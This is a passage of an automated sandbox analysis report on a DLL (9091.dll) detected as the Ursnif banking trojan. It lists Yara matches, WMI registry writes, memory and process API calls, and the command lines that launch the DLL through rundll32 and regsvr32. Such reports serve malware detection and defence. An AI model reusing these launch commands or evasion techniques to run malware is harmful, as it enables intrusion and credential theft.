                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 9091.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021B40_2_100021B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AFC00_2_00D4AFC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D47FBE0_2_00D47FBE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4836E0_2_00D4836E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910B680_2_00910B68
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910B6A0_2_00910B6A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD7FBE3_2_02BD7FBE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAFC03_2_02BDAFC0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD836E3_2_02BD836E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40B683_2_00A40B68
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40B6A3_2_00A40B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A47FBE4_2_04A47FBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4AFC04_2_04A4AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4836E4_2_04A4836E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0B684_2_00BD0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0B6A4_2_00BD0B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428836E5_2_0428836E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04287FBE5_2_04287FBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428AFC05_2_0428AFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70B6A5_2_00B70B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70B685_2_00B70B68
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000129A NtMapViewOfSection,0_2_1000129A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000119D GetProcAddress,NtCreateSection,memset,0_2_1000119D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001540 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_10001540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023D5 NtQueryVirtualMemory,0_2_100023D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00D49A0F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4B1E5 NtQueryVirtualMemory,0_2_00D4B1E5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910541 NtAllocateVirtualMemory,0_2_00910541
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910779 NtProtectVirtualMemory,0_2_00910779
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BD9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_02BD9A0F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDB1E5 NtQueryVirtualMemory,3_2_02BDB1E5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40779 NtProtectVirtualMemory,3_2_00A40779
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40541 NtAllocateVirtualMemory,3_2_00A40541
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04A49A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4B1E5 NtQueryVirtualMemory,4_2_04A4B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0779 NtProtectVirtualMemory,4_2_00BD0779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0541 NtAllocateVirtualMemory,4_2_00BD0541
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04289A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04289A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0428B1E5 NtQueryVirtualMemory,5_2_0428B1E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70779 NtProtectVirtualMemory,5_2_00B70779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70541 NtAllocateVirtualMemory,5_2_00B70541
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: 9091.dllStatic PE information: invalid certificate
                      Source: 9091.dllVirustotal: Detection: 22%
                      Source: 9091.dllReversingLabs: Detection: 30%
                      Source: 9091.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9091.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@9/0@16/1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D48F1B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A3 push ecx; ret 0_2_100021B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002150 push ecx; ret 0_2_10002159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AC00 push ecx; ret 0_2_00D4AC09
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4D00C push 00000076h; iretd 0_2_00D4D01A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4E62F push edi; retf 0_2_00D4E630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4E9AC push 0B565A71h; ret 0_2_00D4E9B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D4AFAF push ecx; ret 0_2_00D4AFBF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910384 push dword ptr [ebp-00000284h]; ret 0_2_00910540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009108B2 push dword ptr [esp+0Ch]; ret 0_2_009108C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009108B2 push dword ptr [esp+10h]; ret 0_2_0091090C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009103B6 push dword ptr [ebp-00000284h]; ret 0_2_00910425
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910725 push edx; ret 0_2_009107C7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910725 push dword ptr [esp+10h]; ret 0_2_009108B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910541 push dword ptr [ebp-00000284h]; ret 0_2_00910577
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910779 push edx; ret 0_2_009107C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDE62F push edi; retf 3_2_02BDE630
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDD00C push 00000076h; iretd 3_2_02BDD01A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAC00 push ecx; ret 3_2_02BDAC09
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDE9AC push 0B565A71h; ret 3_2_02BDE9B1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BDAFAF push ecx; ret 3_2_02BDAFBF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A408B2 push dword ptr [esp+0Ch]; ret 3_2_00A408C6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A408B2 push dword ptr [esp+10h]; ret 3_2_00A4090C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A403B6 push dword ptr [ebp-00000284h]; ret 3_2_00A40425
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40384 push dword ptr [ebp-00000284h]; ret 3_2_00A40540
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40725 push edx; ret 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40725 push dword ptr [esp+10h]; ret 3_2_00A408B1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40779 push edx; ret 3_2_00A407C7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40541 push dword ptr [ebp-00000284h]; ret 3_2_00A40577
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4E62F push edi; retf 4_2_04A4E630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4AC00 push ecx; ret 4_2_04A4AC09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4D00C push 00000076h; iretd 4_2_04A4D01A
                      Source: 9091.dllStatic PE information: section name: .arthros
                      Source: 9091.dllStatic PE information: section name: .preter
                      Source: 9091.dllStatic PE information: section name: .witched
                      Source: 9091.dllStatic PE information: section name: .restitu
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: 9091.dllStatic PE information: real checksum: 0xc73e4 should be: 0xd0994
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
